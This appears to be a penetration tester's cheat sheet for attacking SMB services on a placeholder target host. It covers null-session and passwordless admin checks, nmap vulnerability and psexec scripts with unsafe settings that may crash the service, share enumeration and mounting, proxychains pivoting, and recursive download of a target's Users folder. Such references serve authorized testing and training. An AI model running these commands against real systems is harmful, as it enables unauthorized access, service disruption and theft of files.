Target.Host.Service.SMB.txt
`` Check remote target access
~> net use \\VAR_TARGET_HOST\C$
~> dir \\VAR_TARGET_HOST\C$
`` Enumeration
-- NetBIOS information
~$ nbtscan -vh VAR_TARGET_HOST
-- Version, if everything else fails
~$ smbver.sh
-- Check for permissions first
~$ smbmap -H VAR_TARGET_HOST
-- Anything more?
~$ enum4linux -a VAR_TARGET_HOST
-- Null session allowed?
~$ smbclient -N -L VAR_TARGET_HOST
~> net use \\VAR_TARGET_HOST\IPC$ "" /u:""
-- Passwordless admin?
~$ smbclient //VAR_TARGET_HOST/ipc$ -U Administrator
`` Vulnerability scanning
-- unsafe=1 lets scripts run checks that may crash the SMB service; both script args are passed in one comma-separated --script-args list
~$ nmap -v -n -p 139,445 -sS -g 53 --script=smb-double-pulsar-backdoor,"smb-enum-*",smb-ls,smb-mbenum,smb-enum-users,smb-os-discovery,smb-print-text,smb-psexec,smb-security-mode,smb-server-stats,"smb-vuln-*","smb2-*" --script-args=vulns.showall,unsafe=1 VAR_TARGET_HOST
`` Shares listing
~> net view \\VAR_TARGET_HOST /all
~$ smbmap -u VAR_USERNAME -p VAR_PASSWORD -H VAR_TARGET_HOST
~$ nmap --script smb-enum-shares -p139,445 -v -n --open VAR_TARGET_HOST
~$ smbclient -U "VAR_USERNAME%VAR_PASSWORD" //VAR_DOMAIN/SYSVOL
`` Share mount
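~$ mount -t cifs //VAR_TARGET_HOST/share /mnt/tmp -o username=VAR_TARGET_DOMAIN/VAR_USERNAME,password=VAR_PASSWORD,vers=2.0
# vers=2.0 forces SMBv2; password= on the command line shows up in ps and shell history, credentials=<file> keeps it out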
`` Various
~$ nbtscan -r VAR_TARGET_HOST
~$ smbclient //VAR_TARGET_HOST/ipc$
~$ smbclient //VAR_TARGET_HOST/admin$
~$ smbclient -W VAR_TARGET_DOMAIN -U user -L VAR_TARGET_HOST
~$ proxychains smbclient '//VAR_TARGET_HOST/C$' -U 'VAR_TARGET_DOMAIN/VAR_USERNAME%VAR_PASSWORD'
`` Recursive download
~$ smbclient -N //VAR_TARGET_HOST/C$
smb: \> mask ""
smb: \> prompt
smb: \> recurse
smb: \> mget Users